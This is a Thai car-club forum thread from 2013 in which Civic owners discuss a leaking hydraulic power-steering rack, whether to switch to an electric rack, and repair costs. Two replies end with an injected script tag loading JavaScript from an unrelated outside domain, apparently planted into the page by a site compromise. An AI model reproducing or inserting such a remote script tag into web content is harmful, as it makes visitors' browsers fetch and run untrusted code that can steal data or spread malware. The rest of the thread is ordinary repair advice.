ตอบ
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 20 เมษา 2013 20:36 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
* เพราะตอนนี้แร็กของผมซึมอยู่ครับ ให้พี่ที่ร้านแถวพระรามห้าแต่ราคาซ้อม 11000 ครับ พี่เค้าแนะนำให้เปลี่ยนแกนด้วยครับ
สมชาย


เข้าร่วม: 14 มกรา 2013
ตอบ: 5916

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4245
ให้คำขอบคุณ: 7209

ที่อยู่: อ.บ้านบึง จ.ชลบุรี
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
เสาร์, 20 เมษา 2013 22:16 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
..ขอทราบ อาการ แร็กพัง หน่อยครับว่าเป็นไง "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: raksapol 
Tanadath


เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ที่อยู่: 240/29ม.2ต.หนองบัวอ.เมืองจ.อุดรธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 20 เมษา 2013 22:18 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
หลายคนเปลี่ยนแล้วว่าดีครับ ลดภาระเครื่อง ไม่รกห้องเครื่อง หาช่างเก่งๆนะครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: raksapol 
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 20 เมษา 2013 22:47 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
อาการมีน้ำมันซึมออกมาฝั่งคน นั่งข้างคนขับครับ
ได้รับคำขอบคุณจาก: สมชาย 
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 20 เมษา 2013 22:48 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
ตรงหัวที่มียางสีดำหุ้มอ่ะครับ
ได้รับคำขอบคุณจาก: สมชาย 
สมชาย


เข้าร่วม: 14 มกรา 2013
ตอบ: 5916

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4245
ให้คำขอบคุณ: 7209

ที่อยู่: อ.บ้านบึง จ.ชลบุรี
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
เสาร์, 20 เมษา 2013 23:35 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
raksapol พิมพ์ว่า:
อาการมีน้ำมันซึมออกมาฝั่งคน นั่งข้างคนขับครับ


raksapol พิมพ์ว่า:
ตรงหัวที่มียางสีดำหุ้มอ่ะครับ



ผม เคยรั่วแบบเนี้ยเลยครับลงมาพื้น ห้องโดยสาร เลยครับ  ผมซ่อม 1800 หายเป็นปกติเท่าทุกวันนี่ครับ สงสัยแค่น้ำมันเพาว์เวอร์แตกอะครับถูกหน่อยย
ได้รับคำขอบคุณจาก: raksapol 
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 20 เมษา 2013 23:59 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
สมชาย พิมพ์ว่า:
raksapol พิมพ์ว่า:
อาการมีน้ำมันซึมออกมาฝั่งคน นั่งข้างคนขับครับ


raksapol พิมพ์ว่า:
ตรงหัวที่มียางสีดำหุ้มอ่ะครับ



ผม เคยรั่วแบบเนี้ยเลยครับลงมาพื้น ห้องโดยสาร เลยครับ  ผมซ่อม 1800 หายเป็นปกติเท่าทุกวันนี่ครับ สงสัยแค่น้ำมันเพาว์เวอร์แตกอะครับถูกหน่อยย




มันไม่เข้าห้องโดยสารครับ มันซึมตรงปลายแร็ก ตรงห้องเครื่องอ่ะครับ หันหน้าเข้ารถ ปลายฝั่งขวาครับ
jaroenp


ชื่อเล่น: ป๋อ

เข้าร่วม: 29 ธันวา 2010
ตอบ: 376

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 272
ให้คำขอบคุณ: 39

ที่อยู่: BangNa
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 21 เมษา 2013 16:48 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
ดีคร้าบ ผมเป็นคนหนึ่งซึ่งเปลี่ยนแรคน้ำมัน มาเป็นไฟฟ้าครับ
เพราะ
1.แรคนำ้มัน ซ่อมเมื่อไหร่ ทำใจเลยครับว่า จะใช้ได้ต่อไปไม่กี่ปี (ของผมหลังซ่อมใช้ได้ประมาณ3ปี)
2.สายแรงดัน พาวเว่อร์ พวกนี้ก็จะมีอายุครับ ของผมก็สายรั่ว แตกบ้างก็เปลี่ยน
3.ปั้มพาวเวอร์ ถ้าเสื่อม ก็จะมีเสียงลูกปืนดังน่ะ แต่บางครั้งก็อาจน้ำมันซึม ก็แล้วแต่สภาพ อายุ การใช้งาน
สรุป ค่าซ่อมบำรุง ค่อนข้างจุกจิก และเวลามีปัญหาก็เลอะเทอะมากๆ

ก็ลองเปลี่ยนดู แรคไฟฟ้า ก็โอเคร อ่ะ ใช้มา 9 เดือนยังไม่พบปัญหา ครับ

***แต่บอกก่อนว่าฟิลลิ่งในการขับ ผมว่าแรคน้ำมันได้อารมณ์มันส์ แน่น นึบกว่าน่ะ
แต่ด้วยระบบน้ำมัน ใช้อุปกรณ์หลายชิ้นเกี่ยวข้อง ฉะนั้นค่าบำรุงก็เยอะหน่อย
ถ้าวิเคราะห์แก้ไขไม่ตรงจุดล่ะก็ เสียคชจ.ซ้ำซ้อน เพราะบางทีคิดว่าซ่อมได้ แต่จริงๆใช้ไปมันเอาไม่อยู่
เพราะแรคมันรับแรงสั่นสะเทือนตลอดเวลา เคลื่อนไหวตลอด และเป็นระบบที่ใช้แรงดัน ฉะนั้นต้องเพื่อใจ
นิดนึงสำหรับการใช้งานหลังซ่อม (ทะนุถนอมหน่อย อย่าหักโหม เดี๋ยวบาดเจ็บเร็วอ่ะ)

ฝากไว้เป็นข้อมูลครับ เพื่อนสมาชิก
ได้รับคำขอบคุณจาก: raksapol  note_okaasan 
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 21 เมษา 2013 17:01 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
jaroenp พิมพ์ว่า:
ดีคร้าบ ผมเป็นคนหนึ่งซึ่งเปลี่ยนแรคน้ำมัน มาเป็นไฟฟ้าครับ
เพราะ
1.แรคนำ้มัน ซ่อมเมื่อไหร่ ทำใจเลยครับว่า จะใช้ได้ต่อไปไม่กี่ปี (ของผมหลังซ่อมใช้ได้ประมาณ3ปี)
2.สายแรงดัน พาวเว่อร์ พวกนี้ก็จะมีอายุครับ ของผมก็สายรั่ว แตกบ้างก็เปลี่ยน
3.ปั้มพาวเวอร์ ถ้าเสื่อม ก็จะมีเสียงลูกปืนดังน่ะ แต่บางครั้งก็อาจน้ำมันซึม ก็แล้วแต่สภาพ อายุ การใช้งาน
สรุป ค่าซ่อมบำรุง ค่อนข้างจุกจิก และเวลามีปัญหาก็เลอะเทอะมากๆ

ก็ลองเปลี่ยนดู แรคไฟฟ้า ก็โอเคร อ่ะ ใช้มา 9 เดือนยังไม่พบปัญหา ครับ

***แต่บอกก่อนว่าฟิลลิ่งในการขับ ผมว่าแรคน้ำมันได้อารมณ์มันส์ แน่น นึบกว่าน่ะ
แต่ด้วยระบบน้ำมัน ใช้อุปกรณ์หลายชิ้นเกี่ยวข้อง ฉะนั้นค่าบำรุงก็เยอะหน่อย
ถ้าวิเคราะห์แก้ไขไม่ตรงจุดล่ะก็ เสียคชจ.ซ้ำซ้อน เพราะบางทีคิดว่าซ่อมได้ แต่จริงๆใช้ไปมันเอาไม่อยู่
เพราะแรคมันรับแรงสั่นสะเทือนตลอดเวลา เคลื่อนไหวตลอด และเป็นระบบที่ใช้แรงดัน ฉะนั้นต้องเพื่อใจ
นิดนึงสำหรับการใช้งานหลังซ่อม (ทะนุถนอมหน่อย อย่าหักโหม เดี๋ยวบาดเจ็บเร็วอ่ะ)

ฝากไว้เป็นข้อมูลครับ เพื่อนสมาชิก


ขอบคุงมากเลยครับสำหรับข้อมูล ว่าแต่เปลี่ยนแร๊กไฟฟ้า ใช่งบไปเท่าไรครับ
OUM


เข้าร่วม: 26 มิถุนา 2011
ตอบ: 2313

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2142
ให้คำขอบคุณ: 1465

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 21 เมษา 2013 17:21 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
ไฟฟ้าก็ดีนะครับ
jaroenp


ชื่อเล่น: ป๋อ

เข้าร่วม: 29 ธันวา 2010
ตอบ: 376

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 272
ให้คำขอบคุณ: 39

ที่อยู่: BangNa
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 21 เมษา 2013 20:51 - ผมเปลี่ยนแร็กเพาเวอร์เป็นแร็กไฟฟ้าดีป่าว ของคำแนะนำหน่อยครับ *
raksapol พิมพ์ว่า:
jaroenp พิมพ์ว่า:
ดีคร้าบ ผมเป็นคนหนึ่งซึ่งเปลี่ยนแรคน้ำมัน มาเป็นไฟฟ้าครับ
เพราะ
1.แรคนำ้มัน ซ่อมเมื่อไหร่ ทำใจเลยครับว่า จะใช้ได้ต่อไปไม่กี่ปี (ของผมหลังซ่อมใช้ได้ประมาณ3ปี)
2.สายแรงดัน พาวเว่อร์ พวกนี้ก็จะมีอายุครับ ของผมก็สายรั่ว แตกบ้างก็เปลี่ยน
3.ปั้มพาวเวอร์ ถ้าเสื่อม ก็จะมีเสียงลูกปืนดังน่ะ แต่บางครั้งก็อาจน้ำมันซึม ก็แล้วแต่สภาพ อายุ การใช้งาน
สรุป ค่าซ่อมบำรุง ค่อนข้างจุกจิก และเวลามีปัญหาก็เลอะเทอะมากๆ

ก็ลองเปลี่ยนดู แรคไฟฟ้า ก็โอเคร อ่ะ ใช้มา 9 เดือนยังไม่พบปัญหา ครับ

***แต่บอกก่อนว่าฟิลลิ่งในการขับ ผมว่าแรคน้ำมันได้อารมณ์มันส์ แน่น นึบกว่าน่ะ
แต่ด้วยระบบน้ำมัน ใช้อุปกรณ์หลายชิ้นเกี่ยวข้อง ฉะนั้นค่าบำรุงก็เยอะหน่อย
ถ้าวิเคราะห์แก้ไขไม่ตรงจุดล่ะก็ เสียคชจ.ซ้ำซ้อน เพราะบางทีคิดว่าซ่อมได้ แต่จริงๆใช้ไปมันเอาไม่อยู่
เพราะแรคมันรับแรงสั่นสะเทือนตลอดเวลา เคลื่อนไหวตลอด และเป็นระบบที่ใช้แรงดัน ฉะนั้นต้องเพื่อใจ
นิดนึงสำหรับการใช้งานหลังซ่อม (ทะนุถนอมหน่อย อย่าหักโหม เดี๋ยวบาดเจ็บเร็วอ่ะ)

ฝากไว้เป็นข้อมูลครับ เพื่อนสมาชิก


ขอบคุงมากเลยครับสำหรับข้อมูล ว่าแต่เปลี่ยนแร๊กไฟฟ้า ใช่งบไปเท่าไรครับ


7,000(ราคาพิเศษ) +3,000(ค่าแรง)+300(สายไฟส่วนเพิ่ม)
เราต้องเตรียมของให้ครบน่ะครับ. เครน่ะ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...